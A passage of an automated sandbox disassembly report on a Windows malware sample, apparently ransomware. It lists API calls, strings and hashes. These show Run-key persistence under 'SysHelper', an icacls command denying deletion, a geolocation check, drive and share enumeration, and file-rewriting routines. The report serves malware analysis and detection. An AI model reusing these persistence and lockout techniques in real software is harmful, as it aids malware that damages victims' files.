                                                                                                        • LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00F11E99
                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00F11EA5
                                                                                                        • GetCommandLineW.KERNEL32 ref: 00F11EB4
                                                                                                        • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00F11EBF
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F11ECE
                                                                                                        • PathFindFileNameW.SHLWAPI(?), ref: 00F11EDB
                                                                                                        • UuidCreate.RPCRT4(?), ref: 00F11EFC
                                                                                                        • UuidToStringW.RPCRT4(?,?), ref: 00F11F14
                                                                                                        • RpcStringFreeW.RPCRT4(00000000), ref: 00F11F64
                                                                                                        • PathAppendW.SHLWAPI(?,?), ref: 00F11F83
                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00F11F8E
                                                                                                        • PathAppendW.SHLWAPI(?,?,?,?), ref: 00F1202D
                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00F12036
                                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 00F1204C
                                                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00F1206E
                                                                                                        • _memset.LIBCMT ref: 00F12090
                                                                                                        • lstrcpyW.KERNEL32(?,010002FC), ref: 00F120AA
                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 00F120C0
                                                                                                        • lstrcatW.KERNEL32(?," --AutoStart), ref: 00F120CE
                                                                                                        • lstrlenW.KERNEL32(?), ref: 00F120D7
                                                                                                        • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 00F120F3
                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00F120FC
                                                                                                        • _memset.LIBCMT ref: 00F12120
                                                                                                        • SetLastError.KERNEL32(00000000), ref: 00F12146
                                                                                                        • lstrcpyW.KERNEL32(?,icacls "), ref: 00F12158
                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 00F1216D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
                                                                                                        • String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
                                                                                                        • API String ID: 2589766509-1182136429
                                                                                                        • Opcode ID: 75b0ea9ed5a6c70d755f9db131f6b2495528bb81e7e2525188bda73cc56f47eb
                                                                                                        • Instruction ID: b36c8aa8a530a9c08d461c05866b794682494584dec9a728e9d1b739abaac96b
                                                                                                        • Opcode Fuzzy Hash: 75b0ea9ed5a6c70d755f9db131f6b2495528bb81e7e2525188bda73cc56f47eb
                                                                                                        • Instruction Fuzzy Hash: 74E16D71D4021DABDF24DBA0DD4AFEEB7B8BF04704F144069E609E7190EB746A85EB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        APIs
                                                                                                        • CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?), ref: 00F1120F
                                                                                                        • GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 00F11228
                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00F1123D
                                                                                                        • MoveFileW.KERNEL32(00000000,?), ref: 00F11277
                                                                                                        • VirtualAlloc.KERNEL32(00000000,00025815,00001000,00000004,?,00000000,?), ref: 00F112B1
                                                                                                        • _memset.LIBCMT ref: 00F112C8
                                                                                                        • SetFilePointerEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 00F11301
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?), ref: 00F11314
                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00F1131B
                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000026,?,00000000,?,00000000,?), ref: 00F11349
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00000000,?), ref: 00F11381
                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00F11388
                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?), ref: 00F113E6
                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00025805,?,00000000,?,00000000,?), ref: 00F11409
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?), ref: 00F11417
                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00F1141E
                                                                                                        • lstrlenA.KERNEL32(?,?,00000000,?), ref: 00F11471
                                                                                                        • lstrlenA.KERNEL32(?,?,?,00000000,?), ref: 00F11491
                                                                                                        • lstrlenA.KERNEL32(?,00000000,?,?,?,?,?,00000000,?), ref: 00F114CF
                                                                                                        • SetFilePointer.KERNEL32(00000000,00000005,00000000,00000000,00000005,00000000,-000000FB,-000000FB,00000000,00000000,000000FF,00000000,00000000,00000000), ref: 00F1159D
                                                                                                        • SetFilePointerEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 00F115D0
                                                                                                        • WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 00F115F8
                                                                                                        • WriteFile.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00F11649
                                                                                                        • lstrlenA.KERNEL32({36A698B9-D67C-4E07-BE82-0EC5B14B4DF5},00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00F1166B
                                                                                                        • WriteFile.KERNEL32(00000000,{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5},00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00F11678
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 00F1168D
                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00F116D6
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00F116EB
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$CloseHandleVirtual$FreePointerlstrlen$Write$MoveRead$AllocCreateSize_memset
                                                                                                        • String ID: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                        • API String ID: 254274740-1186676987
                                                                                                        • Opcode ID: 4b6a8f105b9d696b19ceb5b506d08863535efadcb91412f7a7f7095f0a406cb3
                                                                                                        • Instruction ID: 4415a5a14f373d38b9b6b317b18468368dca0f5caa05c395136f24eeee771a27
                                                                                                        • Opcode Fuzzy Hash: 4b6a8f105b9d696b19ceb5b506d08863535efadcb91412f7a7f7095f0a406cb3
                                                                                                        • Instruction Fuzzy Hash: A722CC71D00208EBEB14EBA4DC86FEEB7B8FF05310F104158F619A7291DB745A85EBA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • GetCommandLineW.KERNEL32 ref: 00F12235
                                                                                                        • CommandLineToArgvW.SHELL32(00000000,?), ref: 00F12240
                                                                                                        • PathFindFileNameW.SHLWAPI(00000000), ref: 00F12248
                                                                                                        • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00F12256
                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00F1226A
                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00F12275
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00F12280
                                                                                                        • LoadLibraryW.KERNEL32(Psapi.dll), ref: 00F12291
                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00F1229F
                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00F122AA
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00F122B5
                                                                                                        • K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 00F122CD
                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00F122FE
                                                                                                        • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00F12315
                                                                                                        • K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 00F1232C
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F12347
                                                                                                        Strings
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
                                                                                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
                                                                                                        • API String ID: 3668891214-3807497772
                                                                                                        • Opcode ID: 53fce93feb0d91f34c85ab15e7d012488dd00ab168e03f4177ccfd21664d9365
                                                                                                        • Instruction ID: b102dc2bce9a63a9ab66e2f989e954382f3eaeac2b12f5a43d5c843569f501b1
                                                                                                        • Opcode Fuzzy Hash: 53fce93feb0d91f34c85ab15e7d012488dd00ab168e03f4177ccfd21664d9365
                                                                                                        • Instruction Fuzzy Hash: 58315A71E0021DABEB11ABE59C45EEEB7BCEF49740F00406AF908E7150DA749A41ABA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • timeGetTime.WINMM ref: 00F1F15E
                                                                                                        • Sleep.KERNEL32(?), ref: 00F1F185
                                                                                                        • Sleep.KERNEL32(?), ref: 00F1F19D
                                                                                                        • SendMessageW.USER32(?,00008003,00000000,00000000), ref: 00F1F9D0
                                                                                                          • Part of subcall function 00F10A50: GetLogicalDrives.KERNEL32 ref: 00F10A75
                                                                                                          • Part of subcall function 00F10A50: SetErrorMode.KERNEL32(00000001,01000234,00000002), ref: 00F10AE2
                                                                                                          • Part of subcall function 00F10A50: PathFileExistsA.SHLWAPI(?), ref: 00F10AF9
                                                                                                          • Part of subcall function 00F10A50: SetErrorMode.KERNEL32(00000000), ref: 00F10B02
                                                                                                          • Part of subcall function 00F10A50: GetDriveTypeA.KERNEL32(?), ref: 00F10B1B
                                                                                                        Strings
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorModeSleep$DriveDrivesExistsFileLogicalMessagePathSendTimeTypetime
                                                                                                        • String ID: C:\
                                                                                                        • API String ID: 3672571082-3404278061
                                                                                                        • Opcode ID: 6e454659c25cd8ff2292fac46436ee54827e784034b057a2b16edd1ab76566df
                                                                                                        • Instruction ID: 91b7e086fdf215b880cda34871b30fd013288373b715865de4e1fb11b26df438
                                                                                                        • Opcode Fuzzy Hash: 6e454659c25cd8ff2292fac46436ee54827e784034b057a2b16edd1ab76566df
                                                                                                        • Instruction Fuzzy Hash: C842ACB1D003059BDF24DFA8DC85BEEBBB1BF44318F144129E805AB281D775AA89DBD1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 00F0CF4A
                                                                                                        • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 00F0CF5F
                                                                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00F0CFA6
                                                                                                        • InternetReadFile.WININET(00000000,?,00002800,?), ref: 00F0CFCD
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00F0CFDA
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00F0CFDD
                                                                                                        Strings
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Internet$CloseHandleOpen$FileRead_memset
                                                                                                        • String ID: $"country_code":"$$$($Microsoft Internet Explorer$https://api.2ip.ua/geo.json
                                                                                                        • API String ID: 1485416377-933853286
                                                                                                        • Opcode ID: 61441a6f0066839c4c52a456c7d089f7571ca33a2be22f850fc48ef7fc64afe0
                                                                                                        • Instruction ID: c2e735cbea598320ff28923073eafff9778a3ae12fcb82617d82c95ab9e00881
                                                                                                        • Opcode Fuzzy Hash: 61441a6f0066839c4c52a456c7d089f7571ca33a2be22f850fc48ef7fc64afe0
                                                                                                        • Instruction Fuzzy Hash: 0791C071D00218EAEF25CFA0DD46BEEBBB4AF05704F244168E405772C1DBB65A88EB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • PostQuitMessage.USER32(00000000), ref: 00F1BB49
                                                                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 00F1BBBA
                                                                                                        • _malloc.LIBCMT ref: 00F1BBE4
                                                                                                        • GetComputerNameW.KERNEL32(00000000,?), ref: 00F1BBF4
                                                                                                        • _free.LIBCMT ref: 00F1BCD7
                                                                                                          • Part of subcall function 00F11CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,00FCAC68,000000FF), ref: 00F11D12
                                                                                                          • Part of subcall function 00F11CD0: _memset.LIBCMT ref: 00F11D3B
                                                                                                          • Part of subcall function 00F11CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00F11D63
                                                                                                          • Part of subcall function 00F11CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FCAC68,000000FF), ref: 00F11D6C
                                                                                                          • Part of subcall function 00F11CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00F11DD6
                                                                                                          • Part of subcall function 00F11CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00F11E48
                                                                                                        • IsWindow.USER32(?), ref: 00F1BF69
                                                                                                        • DestroyWindow.USER32(?), ref: 00F1BF7B
                                                                                                        • DefWindowProcW.USER32(?,00008003,?,?), ref: 00F1BFA8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 00F20FDD: __wfsopen.LIBCMT ref: 00F20FE8
                                                                                                        • _fgetws.LIBCMT ref: 00F0C7BC
                                                                                                        • _memmove.LIBCMT ref: 00F0C89F
                                                                                                        • CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 00F0C94B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: CreateDirectory__wfsopen_fgetws_memmove
                                                                                                        • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,00F1E6D4), ref: 00F0C6C2
                                                                                                        • RegQueryValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,?), ref: 00F0C6F3
                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00F0C700
                                                                                                        • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 00F0C725
                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00F0C72E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: CloseValue$OpenQuery
                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 00F1E707
                                                                                                          • Part of subcall function 00F0C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 00F0C51B
                                                                                                        • InternetOpenW.WININET ref: 00F1E743
                                                                                                        • _wcsstr.LIBCMT ref: 00F1E7AE
                                                                                                        • _memmove.LIBCMT ref: 00F1E838
                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 00F1E90A
                                                                                                        • lstrcatW.KERNEL32(?,&first=false), ref: 00F1E93D
                                                                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00F1E954
                                                                                                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00F1E96F
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F1E98C
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F1E9A3
                                                                                                        • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 00F1E9CD
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00F1E9F3
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00F1E9F6
                                                                                                        • _strstr.LIBCMT ref: 00F1EA36
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F1EA59
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F1EA74
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00F1EA82
                                                                                                        • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 00F1EA92
                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00F1EAA4
                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00F1EABA
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00F1EAC8
                                                                                                        • lstrlenA.KERNEL32(00000022), ref: 00F1EAE3
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F1EB5B
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00F1EB7C
                                                                                                        • _malloc.LIBCMT ref: 00F1EB86
                                                                                                        • _memset.LIBCMT ref: 00F1EB94
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 00F1EBAE
                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00F1EBB6
                                                                                                        • _strstr.LIBCMT ref: 00F1EBDA
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F1EC00
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F1EC24
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00F1EC32
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmp
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Path$Internetlstrcpylstrlen$Folder$AppendFile$CloseDeleteHandleOpen_memset_strstr$ByteCharMultiReadWide_malloc_memmove_wcsstrlstrcat
                                                                                                        • String ID: bowsakkdestx.txt${"public_key":"
                                                                                                        • API String ID: 2805819797-1771568745
                                                                                                        • Opcode ID: 4d2bb706444261eb452247fb3bb8094ba56bfad4a12b7cdadce7f9967f7ef226
                                                                                                        • Instruction ID: 5b1de9333b9d790a653e7cee5ae1b886ba884276e4aa162948d1784ca3ef3744
                                                                                                        • Opcode Fuzzy Hash: 4d2bb706444261eb452247fb3bb8094ba56bfad4a12b7cdadce7f9967f7ef226
                                                                                                        • Instruction Fuzzy Hash: C9015E71448395AAD630DF209C09FDF7BD8AF51704F44481DFD8893182EB78A248A7A7
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • timeGetTime.WINMM(?,?,?,?,00F1EE2F), ref: 00F11B1E
                                                                                                        • timeGetTime.WINMM(?,?,00F1EE2F), ref: 00F11B29
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F11B4C
                                                                                                        • DispatchMessageW.USER32(?), ref: 00F11B5C
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F11B6A
                                                                                                        • Sleep.KERNEL32(00000064,?,?,00F1EE2F), ref: 00F11B72
                                                                                                        • timeGetTime.WINMM(?,?,00F1EE2F), ref: 00F11B78
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: MessageTimetime$Peek$DispatchSleep
                                                                                                        • String ID:
                                                                                                        • API String ID: 3697694649-0
                                                                                                        • Opcode ID: 70e00d3c7ca9863c5b97137e741ed8003539c8c560fd0d1e5621bbac3d6ff8f6
                                                                                                        • Instruction ID: 8480a2efe41423b6e2a9e31a4c826571f70f5929b3924b152e85f038ad66e984
                                                                                                        • Opcode Fuzzy Hash: 70e00d3c7ca9863c5b97137e741ed8003539c8c560fd0d1e5621bbac3d6ff8f6
                                                                                                        • Instruction Fuzzy Hash: E8018F32E40319AADB20EBE59D42FEDB76CBB88B50F044066F704B71D0E674A941DBE5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 00F0C51B
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F0C539
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Path$AppendFolder
                                                                                                        • String ID: bowsakkdestx.txt
                                                                                                        • API String ID: 29327785-2616962270
                                                                                                        • Opcode ID: 90717251b0fcf13363ddd906e1224d6163558844bf0fcca1c48b980f44bf27fa
                                                                                                        • Instruction ID: f13fc6840c3351d18b837a6918a0691152ce2a0c46435a7553decb71bc6d2cd8
                                                                                                        • Opcode Fuzzy Hash: 90717251b0fcf13363ddd906e1224d6163558844bf0fcca1c48b980f44bf27fa
                                                                                                        • Instruction Fuzzy Hash: 1611E7B6A8022832D93071697C47FEF735C9F42721F0401A2FE0C97182A56E965675E2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 00F1BAAD
                                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 00F1BABE
                                                                                                        • UpdateWindow.USER32(00000000), ref: 00F1BAC5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Window$CreateShowUpdate
                                                                                                        • String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
                                                                                                        • API String ID: 2944774295-3503800400
                                                                                                        • Opcode ID: 27f16c287b934527817e5bb3cdbf4ec95665a07aa20ce46644fb8ab2be97fa62
                                                                                                        • Instruction ID: 82b08a784566cdd258f75c1b463ba5949a2ea1a9a5503cfd08f3b128a3835aba
                                                                                                        • Opcode Fuzzy Hash: 27f16c287b934527817e5bb3cdbf4ec95665a07aa20ce46644fb8ab2be97fa62
                                                                                                        • Instruction Fuzzy Hash: E1E01A31681764BAF23257167D0BF963514BB05F20F204109FA447E2C4C6EA68429BCC
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • WNetOpenEnumW.MPR(00000002,00000000,00000000,00000000,?), ref: 00F10C12
                                                                                                        • GlobalAlloc.KERNEL32(00000040,00004000), ref: 00F10C39
                                                                                                        • _memset.LIBCMT ref: 00F10C4C
                                                                                                        • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00F10C63
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Enum$AllocGlobalOpenResource_memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 364255426-0
                                                                                                        • Opcode ID: 8b15944d6fd135bc9d430b9cfc93946d25b25960bc0f189668f793c297194f01
                                                                                                        • Instruction ID: a4dbaaa30a5d6a9c44f0d8485a1b1792e6cbebd30cf620a9b67c55f0f1d20ac4
                                                                                                        • Opcode Fuzzy Hash: 8b15944d6fd135bc9d430b9cfc93946d25b25960bc0f189668f793c297194f01
                                                                                                        • Instruction Fuzzy Hash: 9B91BF75A08341CFD728DF68D891BABB7E1FF84714F14891DF48A87281DBB4A980DB52
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • GetLogicalDrives.KERNEL32 ref: 00F10A75
                                                                                                        • SetErrorMode.KERNEL32(00000001,01000234,00000002), ref: 00F10AE2
                                                                                                        • PathFileExistsA.SHLWAPI(?), ref: 00F10AF9
                                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 00F10B02
                                                                                                        • GetDriveTypeA.KERNEL32(?), ref: 00F10B1B
                                                                                                        Memory Dump Source
